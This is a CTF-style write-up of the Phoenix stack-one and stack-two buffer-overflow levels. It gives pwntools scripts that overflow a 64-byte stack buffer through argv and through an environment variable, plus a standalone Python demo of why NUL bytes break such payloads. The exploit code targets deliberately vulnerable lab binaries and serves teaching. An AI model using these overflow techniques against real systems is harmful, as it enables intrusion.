These two levels are very simple; they differ only in how the input is read. As with stack-zero, the overwritten data must match a specific value.
stack-one
The program copies its first argument into a stack buffer with strcpy.
When running it under gdb, the argument can simply be passed on the run command line.
pwntools' ssh.run accepts a byte string, which can include the program's command-line arguments. (The documentation notes that run is kept for backward compatibility and that system() should be used instead.)
from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)
# 0x40 bytes fill the buffer, then the 32-bit value the program checks for (little-endian)
s = b"a" * 0x40 + p32(0x496c5962)
# the payload is delivered as argv[1], appended to the command line
sh = shell.run(b"/opt/phoenix/amd64/stack-one " + s)
print(sh.recvlines(2))
stack-two
This time the input comes from an environment variable.
At this point it turns out that a "\0" byte in the environment variable causes problems. The value we need is 32 bits wide, so p64 must not be used: it pads the value with zero bytes, and the run then throws an error.
from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)
# p32, not p64: the 64-bit pack would append zero bytes, which cannot live in an environment variable
s = b"a" * 0x40 + p32(0x0d0a090a)
print(s)
# the env dict wants a str; every byte here is ASCII, so a plain decode is lossless
s = s.decode()
print(s)
# the payload is delivered through the ExploitEducation environment variable
sh = shell.run(b"/opt/phoenix/amd64/stack-two", env={"ExploitEducation": s})
print(sh.recvlines(2))
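The following is an added, stand-alone example (not part of the original write-up and not pwntools code) that illustrates the delivery constraint behind both stack-one and stack-two: argv entries and environment variables are NUL-terminated C strings, so a payload containing a 0x00 byte is cut short, and Python's own os.putenv refuses it outright. The p32/p64 helpers are struct-based stand-ins for the pwntools functions so the script runs without pwntools; BUF_LEN, build_payload, delivery_problems, to_env_str, env_accepts and round_trips are names chosen for this example. It also shows why a payload with bytes above 0x7f should be converted with os.fsdecode rather than a plain .decode(), which goes beyond the all-ASCII case on the page.

```python
import os
import struct

BUF_LEN = 0x40  # size of the stack buffer overflowed in stack-one / stack-two


def p32(value):
    """Little-endian 32-bit pack; stand-in for pwntools p32 (constructed here)."""
    return struct.pack("<I", value)


def p64(value):
    """Little-endian 64-bit pack; stand-in for pwntools p64 (constructed here)."""
    return struct.pack("<Q", value)


def build_payload(target, width=32):
    """Padding that fills the buffer, followed by the value that must land
    in the variable the program compares against."""
    packed = p32(target) if width == 32 else p64(target)
    return b"a" * BUF_LEN + packed


def delivery_problems(payload):
    """Reasons this payload cannot reach a C program intact via argv or an
    environment variable: both are NUL-terminated, so a 0x00 byte ends the
    string early and the target only ever sees the bytes before it."""
    problems = []
    nul = payload.find(b"\x00")
    if nul != -1:
        problems.append(f"NUL byte at offset {nul}; the target would only see {nul} bytes")
    return problems


def to_env_str(payload):
    """Convert raw bytes to the str that os.environ / subprocess expect.
    os.fsdecode uses surrogateescape, so bytes >= 0x80 survive the round
    trip through os.fsencode; a plain .decode() would raise or re-encode."""
    return os.fsdecode(payload)


def round_trips(payload):
    """True if the str form encodes back to exactly the original bytes."""
    return os.fsencode(to_env_str(payload)) == payload


def env_accepts(payload):
    """Try to export the payload as an environment variable of this process.
    os.putenv raises ValueError for an embedded NUL byte, which is the
    error the p64 variant runs into."""
    name = "EXPLOIT_EDUCATION_DEMO"  # constructed variable name for the demo
    try:
        os.putenv(name, to_env_str(payload))
        os.unsetenv(name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # the 32-bit value from the stack-two write-up, packed both ways
    good = build_payload(0x0D0A090A, width=32)
    bad = build_payload(0x0D0A090A, width=64)
    print(len(good), delivery_problems(good), env_accepts(good))
    print(len(bad), delivery_problems(bad), env_accepts(bad))
```

Running it shows that the 32-bit payload is 68 bytes with no problems and is accepted, while the p64 version is 72 bytes, carries a NUL at offset 68 and is rejected before the target program is ever started. The same NUL rule applies to the argv delivery used in stack-one, which is why a 4-byte target value is packed with p32 in both levels.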